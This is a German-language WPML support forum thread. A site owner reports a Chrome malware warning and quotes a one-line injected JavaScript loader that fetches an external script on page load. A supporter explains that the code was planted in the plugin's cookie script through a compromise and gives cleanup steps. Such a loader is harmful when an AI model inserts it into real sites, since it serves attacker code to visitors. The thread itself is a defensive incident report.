[DRINGEND] Malware gefunden in dem WPML Multiligual Plugin

Dies ist das technische Support-Forum für WPML – das mehrsprachige WordPress-Plugin.

Mitlesen können alle, doch nur WPML-Kunden können hier Fragen veröffentlichen. Das WPML-Team antwortet im Forum an 6 Tagen pro Woche, 22 Stunden am Tag.

Sun	Mon	Tue	Wed	Thu	Fri	Sat
-	8:00 – 13:00	9:00 – 13:00	9:00 – 13:00	8:00 – 12:00	8:00 – 12:00	-
-	14:00 – 17:00	14:00 – 18:00	14:00 – 18:00	13:00 – 17:00	13:00 – 17:00	-

Supporter-Zeitzone: Europe/Zagreb (GMT+01:00)

Schlagwörter: Exception, Not WPML issue

Dieses Thema enthält 2 Antworten, hat 1 Stimme.

Zuletzt aktualisiert von Bruno Kos Vor 2 Monaten.

Assistiert von: Bruno Kos.

Autor	Beiträge
Dezember 18, 2025 um 4:51 p.m. #17675810
elisabethS-17 Eigentümer der Website	Hallo liebes WPML Team, Seit heute Mittag wird unsere Webseite ( versteckter Link ) durch den Chrome Browser als Malware erkannt: versteckter Link Im Vergleich zu früheren Version der Website, wo es noch funktioniert hat, ist im Quelltext folgender Link hinterlegt: anstatt der alten Verlinkung auf "versteckter Link", die gut funktioniert hat. Ich habe mir die beiden Verlinkungen angeschaut und der unterschied liegt in einer weiteren zusätzlichen Zeile code die ausgeführt wird, nämlich: (function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','versteckter Link'); - SIEHE SCREENSHOTS. Diese Function scheint von Chrome als Malware erkannt zu werden. Wichtig: Bei anderen Browsern ist dies nicht der Fall und man kann die Webeite ohne Probleme besuchen.
Dezember 19, 2025 um 2:12 p.m. #17678081
elisabethS-17 Eigentümer der Website	Dringend: Ticket unbeantwortet Sehr geehrtes Support-Team, ich beziehe mich auf mein Support-Ticket, das ich vor über 20 Stunden eingereicht habe. Bislang habe ich weder eine Rückmeldung noch eine Lösung erhalten. Unsere Webseite ist derzeit im Chrome-Browser nicht funktionsfähig. Bitte priorisieren Sie dieses Ticket entsprechend und melden Sie sich zeitnah. Vielen Dank für eine schnelle Klärung.
Dezember 19, 2025 um 3:07 p.m. #17678273
Bruno Kos WPML-Unterstützer seit 12/2018 Sprachen: Englisch (English ) Deutsch (Deutsch ) Französisch (Français ) Zeitzone: Europe/Zagreb (GMT+01:00)	Hallo, Ich habe die Datei wp-content/plugins/sitepress-multilingual-cms/res/js/cookies/language-cookie.js mit einer sauberen, offiziellen WPML-Installation verglichen. In der originalen WPML-Version endet die Datei nach: }); Der zusätzliche JavaScript-Block, der die externe Datei versteckter Link lädt, ist nicht Bestandteil von WPML und wurde nachträglich auf Ihrem Server in diese Datei eingefügt. WPML verändert oder ergänzt seine JavaScript-Dateien nicht dynamisch. Das bedeutet, dass diese Änderung durch einen externen Zugriff (z. B. kompromittierte Zugangsdaten, Hosting-Problem oder eine andere Sicherheitslücke) entstanden ist. Zum Abgleich empfehlen wir, das Plugin direkt von unserer offiziellen Website neu herunterzuladen und zu installieren: https://wpml.org/download/wpml-multilingual-cms/?section=changelog Bitte löschen Sie den bestehenden WPML-Plugin-Ordner vollständig und laden Sie anschließend eine frische, unveränderte Version hoch. Zusätzlich empfehlen wir dringend: * eine vollständige Malware-Bereinigung der Website * die Überprüfung aller installierten Plugins und Themes * die korrekte Einrichtung von HTTPS (SSL) Nach der Bereinigung sollte die Warnung im Chrome-Browser nicht mehr auftreten.

Das Thema '[Geschlossen] [DRINGEND] Malware gefunden in dem WPML Multiligual Plugin' ist für neue Antworten geschlossen.